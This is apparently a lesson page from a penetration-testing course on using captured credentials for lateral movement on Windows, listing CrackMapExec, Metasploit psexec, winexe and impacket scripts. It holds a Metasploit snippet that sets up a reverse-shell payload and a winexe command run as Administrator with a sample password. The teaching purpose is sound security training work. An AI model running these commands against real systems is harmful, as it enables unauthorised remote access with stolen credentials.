M14L1: Using Credentials to Own Windows Boxes – Part 1

Using Credentials to Own Windows Boxes

In other lessons, it is mentioned how to obtain or decrypt passwords, one of them is using capture of a hash, but the question is, after gaining that password, what do it?.

First, we start by defining the concept or by creating an idea of what we have, for to have a solid foundation of knowledge.

Programming language python is of great importance in this lesson, many of the tools we use are written in that language if you do not know about it, do not worry, but it would be essential for you to learn this programming language because you can use it in other things.

We started to define a list of tools, and we already know metasploit and msfconsole.

CrackMapExec: Post-exploitation tool and can be used in the following operating systems.

  1. Kali  installation #~ apt-get install crackmapexec
  2. Ubuntu/Debian installation #~ apt-get install -y libssl-dev libffi-dev python-dev build-essential #~ pip install crackmapexe
  3. Mac OSX installation #~ pip install –user crackmapexec

Metasploit psexec: This module or tool is used to access the system after obtaining the credentials. Coming up next, we have a simple example that you can edit according to the addresses, username, and password. We use the show options command to see the variables of the exploit and edit it

use exploit/windows/smb/psexec
set PAYLOAD windows/shell/reverse_tcp
set LPORT 4444

Winexe: It is a tool to execute Windows commands remotely for example.

[email protected]:~# winexe -U ‘Administrator%s3cr3t’ // ‘cmd.exe /c echo “this is running on windows”‘

psexec.py: This is another tool that allows you to execute Windows commands remotely, it is interesting because it is written in Python.

link: https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

smbexec.py: It is very similar to psexec.py you can see the source code in the following link is written in Python, if you are interested in reading code and have knowledge in Python you can modify it to make it work better


wmiexec.py: It is very similar to smbexec, It is also written in Python in this link you can see the source code, and you can modify it in case you consider it necessary

link: https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

All the tools mentioned above are excellent after you have the username and password, although these are not the only ones if you do a good investigation of the lesson you will find many more.

Back to: Ultimate Hacklab Self Paced > Module 14: Lateral movement & attacking AD